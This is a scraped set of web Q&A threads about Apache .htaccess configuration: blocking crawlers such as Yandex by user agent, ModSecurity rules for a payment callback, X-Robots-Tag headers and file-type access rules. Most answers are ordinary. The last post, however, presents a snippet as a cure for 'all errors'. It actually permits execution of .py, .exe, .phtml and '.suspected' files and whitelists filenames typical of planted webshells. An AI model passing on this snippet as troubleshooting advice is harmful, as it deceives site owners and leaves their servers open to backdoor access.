I'm trying to block yandex from my site. I've tried the solutions posted in other threads but they are not working so I'm wondering if I am doing something wrong?
The user-agent string is:
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots
I have tried the following (one at a time). RewriteEngine is on
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
Order Allow,Deny
Deny from env=bad_bot_block
Allow from ALL
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
<RequireAll>
Require all granted
Require not env bad_bot_block
</RequireAll>
Can anyone see a reason one of the above won't work or have any other suggestions?
In case anyone else has this problem, the following worked for me:
RewriteCond %{HTTP_USER_AGENT} ^.*(yandex).*$ [NC]
RewriteRule .* - [F,L]
SetEnvIfNoCase User-Agent "^yandex.com$" bad_bot_block
With the start and end-of-string anchors in the regex you are bascially checking that the User-Agent string is exactly equal to "yandex.com" (except that the . is any character), which clearly does not match the stated user-agent string.
You need to check that the User-Agent header contains "YandexBot" (or "yandex.com"). You can also use a case-sensitive match here, since the real Yandex bot does not vary the case.
For example, try the following instead:
SetEnvIf User-Agent "YandexBot" bad_bot_block
Consider using the BrowserMatch directive instead, which is a shortcut for SetEnvIf User-Agent.
If you are on Apache 2.4 then you should be using the Require (second) variant of your two code blocks. Order, Deny and Allow directives are Apache 2.2 and formerly deprecated on Apache 2.4.
However, consider using using robots.txt instead to block crawling in the first place. Yandex supposedly supports robots.txt.
Related
How do I block Useragents and IPs AT THE SAME TIME?
Currently using this
SetEnvIfNoCase User-Agent "Chrome/80" good_ua
SetEnvIfNoCase User-Agent "Chrome/81" good_ua
SetEnvIfNoCase User-Agent "Chrome/82" good_ua
SetEnvIfNoCase User-Agent "Chrome/83" good_ua
order deny,allow
deny from all
allow from env=good_ua
That white lists those UAs. But when I try adding this code
deny from 1.1.1.1
deny from 1.0.0.1
only blocking UA works, I can not make them both work at the time. I need to block IPs and allow certain UAs.
my payment gateway is blocked by mod_security when trying to access Woocommerce endpoint.
receiving 403 permission denied when trying to access the "/wc-api/my_gateway_payment_callback" endpoint.
im on an Litespeed shared host.
when disabling the mod_security from .htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
it solves the issue but exposes Wordpress admin to attacks, so i want to be more specific.
i tried to add a LocationMatch
<LocationMatch "/wc-api/my_gateway_payment_callback">
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
</LocationMatch>
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they dont work and im still getting the 403 error.
I can spot multiple problems here:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Are you really using ModSecurity v1? That is VERY old and suggests you are using Apache 1 as ModSecurity v1 is not compatible with ModSecurity v1. If not this should be:
<IfModule mod_security2.c>
SecRuleEngine Off
</IfModule>
Next you say:
it solves the issue but exposes Wordpress admin to attacks
I don't see how it can solve the issue unless you are on REALLY old software, so suspect this is a red herring.
so i want to be more specific. i tried to add a LocationMatch
Good idea to be more specific. However LocationMatch runs quite late in Apache process - after ModSecurity rules will have run so this will not work. However you don’t really need LocationMatch since your rule already scopes it to that location. So let’s look at the next two pieces:
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
SecRuleRemoveById 3000
You shouldn't need to remove the rule if you allow it on the previous lines. Typically you would only do one or the other.
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" > \
"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they dont work and im still getting the 403 error.
You have pass (which means continue on to the next rule) and allow (which means skip all future rules). It seems to me you only want the latter and not the former. As these are conflicting, I suspect ModSecurity will action the former first hence why it is not working.
However the better way is to look at the Apache error logs to see what rule it's failing on (is it rule 3000 as per your other LocationMatch workaround?) and just disable that one rule rather than disable all rules for that route.
So all in all I'm pretty confused with your question as seems to be a lot of inconsistencies and things that are just wrong in there...
I am so tired of Yandex, Baidu, and MJ12bot eating all my bandwidth. None of them even care about the useless robots.txt file.
I would also like to block any user-agent with the word "spider" in it.
I have been using the following code in my .htaccess file to look at the user-agent string and block them that way but it seems they still get through. Is this code correct? Is there a better way?
BrowserMatchNoCase "baidu" bots
BrowserMatchNoCase "yandex" bots
BrowserMatchNoCase "spider" bots
BrowserMatchNoCase "mj12bot" bots
Order Allow,Deny
Allow from ALL
Deny from env=bots
To block user agents, you can use :
SetEnvIfNoCase User-agent (yandex|baidu|foobar) not-allowed=1
Order Allow,Deny
Allow from ALL
Deny from env=not-allowed
Can I 'noindex, follow' a specific page using x robots in .htaccess?
I've found some instructions for noindexing types of files, but I can't find instruction to noindex a single page, and what I have tried so far hasn't worked.
This is the page I'm looking to noindex:
http://www.examplesite.com.au/index.php?route=news/headlines
This is what I have tried so far:
<FilesMatch "/index.php?route=news/headlines$">
Header set X-Robots-Tag "noindex, follow"
</FilesMatch>
Thanks for your time.
It seems to be impossible to match the request parameters from within a .htaccess file. Here is a list of what you can match against: http://httpd.apache.org/docs/2.2/sections.html
It will be much easier to do it in your script. If you are running on PHP try:
header('X-Robots-Tag: noindex, follow');
You can easily build conditions on $_GET, REQUEST_URI and so on.
RewriteEngine on
RewriteBase /
#set env variable if url matches
RewriteCond %{QUERY_STRING} ^route=news/headlines$
RewriteRule ^index\.php$ - [env=NOINDEXFOLLOW:true]
#only sent header if env variable set
Header set X-Robots-Tag "noindex, follow" env=NOINDEXFOLLOW
FilesMatch works on (local) files, not urls. So it would try to match only the /index.php part of the url. <location> would be more appropriate, but as far as I can read from the documentation, querystrings are not allowed here. So I ended up with the above solution (I really liked this challenge). Although php would be the more obvious place to put this, but that is up to you.
The solution requires mod_rewrite, and mod_headers of course.
Note that you'll need the mod_headers module enabled to set the headers.
Though like others have said, it seems better to use the php tag. Does that not work?
According to Google the syntax would be a little different:
<Files ~ "\.pdf$">
Header set X-Robots-Tag "noindex, nofollow"
</Files>
https://developers.google.com/webmasters/control-crawl-index/docs/robots_meta_tag
I saw several htaccess example disabling some files to access:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
for example, this prevents to access all .JS and .SQL files, the others are enabled. I want the contrary! I want those files to be ENABLED, all others to be prevented. How to achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The order cause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaulated: if a request matches any deny directives, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaulated: if a request matches an allow directive, it's allowed in, even if it matches a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
oh and, one more thing: directives in a section (i.e. < Files> and < Directory>) are always evaulated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as inteded: the main .htaccess denied the request, then the < Files> order was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
if you are having trouble with your website, use this htaccess code. It solves all error you may likely encounter
DirectoryIndex index.html index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this help you, don't forget to thump up!!!